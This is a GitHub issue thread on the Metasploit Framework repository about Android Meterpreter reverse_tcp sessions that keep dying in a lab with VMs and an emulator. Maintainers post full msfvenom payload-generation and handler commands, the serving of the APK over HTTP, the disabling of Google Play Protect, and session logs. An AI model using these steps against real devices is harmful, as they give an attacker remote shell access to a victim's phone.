search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.29k stars 14.01k forks source link

My session keeps dieing and I suspect this is why I the apk file is not downloading #18485

Closed samspalin closed 10 months ago

samspalin commented 1 year ago

Please I need help. I've searched online but I am not getting anything positive. I am currently running Kali linux 6.3.0-kali1-amd64 on VMware and Android OS version 8.1 on VirtualBox.

I created the payload with msfvenom, to execute it on the target:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.130 LPORT=4444  R > /var/www/html/Android.apk

I also tried:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.130 LPORT=4444  -o /var/www/html/Android.apk --platform android -a dalvik

I set the payload, host and port on metesploit: 

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.25.130
lhost => 192.168.25.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444

But whenever I attempt to download the Android.apk file from the Android device, it does not work. My meterpreter session shows like this:

[*] Started reverse TCP handler on 192.168.25.130:4444 
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] 192.168.25.1 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.25.1 - Meterpreter session 2 closed.
[-] Meterpreter session 1 is not valid and will be closed
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] 192.168.25.1 - Meterpreter session 3 closed.  Reason: Died
[-] Meterpreter session 3 is not valid and will be closed
[-] Meterpreter session 4 is not valid and will be closed
[*] 192.168.25.1 - Meterpreter session 4 closed.

Is there something I am missing perhaps or something I did not write correctly?

github-actions[bot] commented 1 year ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

adfoster-r7 commented 1 year ago

It's not clear what's going wrong; If this is still replicating, running the setg SessionTlvLogging true command to log the network traffic might be useful for debugging

https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets

sjanusz-r7 commented 1 year ago

Hello 👋 I wasn't able to reproduce this issue, however I've used Android Studio on MacOS. I've tested the payload/android/meterpreter/reverse_tcp payload on an Android emulator in Android Studio with the following steps:

  1. cd metasploit-framework
  2. bundle install
  3. bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik'
  4. bundle exec './msfconsole -q'
  5. use payload/android/meterpreter/reverse_tcp
  6. set LHOST 192.168.64.1
  7. set LPORT 4444
  8. to_handler
  9. Install and run the Meterpreter APK file on the Android device

I've tested this on master as well as by recompiling the Android payloads using Docker from the metasploit-payloads repository, both of which worked and got me a working session.

I also used Python's http.server to download the ./tmp/met.apk Meterpreter APK on the Android emulator. It's worth pointing out that in my setup, I had to disable Google Play Protect on the emulator, otherwise the Meterprete rAPK would not be installed.

Log Output

Generating Payload: ``` bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik' No encoder specified, outputting raw payload Payload size: 10238 bytes Saved as: ./tmp/met.apk ``` Getting a session: ``` msf6 payload(android/meterpreter/reverse_tcp) > to_handler [*] Payload Handler Started as Job 2 [*] Started reverse TCP handler on 192.168.64.1:4444 msf6 payload(android/meterpreter/reverse_tcp) > [*] Sending stage (70945 bytes) to 192.168.64.1 [*] Meterpreter session 3 opened (192.168.64.1:4444 -> 192.168.64.1:51906) at 2023-11-06 11:36:22 +0000 sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 3 meterpreter dalvik/android u0_a84 @ localhost 192.168.64.1:4444 -> 192.168.64.1:51906 (fe80::ff:fe44:5566) msf6 payload(android/meterpreter/reverse_tcp) > sessions -i -1 [*] Starting interaction with 3... meterpreter > getuid Server username: u0_a84 ```
samspalin commented 1 year ago

Hello 👋 I wasn't able to reproduce this issue, however I've used Android Studio on MacOS. I've tested the payload/android/meterpreter/reverse_tcp payload on an Android emulator in Android Studio with the following steps:

  1. cd metasploit-framework
  2. bundle install
  3. bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik'
  4. bundle exec './msfconsole -q'
  5. use payload/android/meterpreter/reverse_tcp
  6. set LHOST 192.168.64.1
  7. set LPORT 4444
  8. to_handler
  9. Install and run the Meterpreter APK file on the Android device

I've tested this on master as well as by recompiling the Android payloads using Docker from the metasploit-payloads repository, both of which worked and got me a working session.

I also used Python's http.server to download the ./tmp/met.apk Meterpreter APK on the Android emulator. It's worth pointing out that in my setup, I had to disable Google Play Protect on the emulator, otherwise the Meterprete rAPK would not be installed.

Log Output

Hello Thank you for this however, I do have some questions. Did you create the payload with this payload/android/meterpreter/reverse_tcp on a kali machine?

Also, where did you run these commands below? Did you run them on kali or on the terminal in the Android studio on MacOS?

"cd metasploit-framework bundle install bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk -- platform android -a dalvik' bundle exec './msfconsole -q' use payload/android/meterpreter/reverse_tcp set LHOST 192.168.64.1 set LPORT 4444 to_handler"

sjanusz-r7 commented 1 year ago

After double checking: I installed a fresh Kali 2023.3 which seems to be: Kali 2023.3 - 23rd August, 2023 - The third [2023 Kali Rolling release](https://www.kali.org/blog/kali-linux-2023-3-release/). Kernel 6.3.0, Xfce 4.18.4. (taken from here). My Kali machine had an IP of 192.168.112.176 which is what I've used as the LHOST. On my fresh Kali install I called:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.112.176 LPORT=4444 -o /tmp/met.apk

This resulted in the following output:

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10236 bytes
Saved as: /tmp/met.apk

I then called, on Kali in the terminal:

msfconsole
use android/meterpreter/reverse_tcp 
set LHOST=192.168.112.176
to_handler

I opened a new tab in my terminal and called python -m http.server in the /tmp folder and downloaded the generated met.apk on the Android device, disabled Google Play Protect, installed and then opened the app. I received:

msf6 payload(android/meterpreter/reverse_tcp) > 
[*] Sending stage (78189 bytes) to 192.168.112.1
[*] Meterpreter session 1 opened (192.168.112.176:4444 -> 192.168.112.1:62288) at 2023-11-17 10:20:03 +0000

Can you provide the output of the output and logs as requested, and potentially setting setg SessionTLVLogging true? What's the architecture of the Android device? I wasn't able to replicate this issue on a fresh (Framework: 6.3.27-dev) and on the master branch.

github-actions[bot] commented 11 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

mikelkarma commented 10 months ago

I was having this same problem, I managed to solve it by adjusting the metstage.jar waiting time https://github.com/mikelkarma/Meterpreter-Android

samspalin commented 10 months ago

Thank you to everyone who assisted with this. I researched further on the recommendation that have were given and discovered it was not an issue with any setups. I realised the link to my apache server that I was using had the metasploit port 4444 which I included and once I removed it my meterpreter session started every time I tried it.

samspalin commented 10 months ago

Thank you everyone!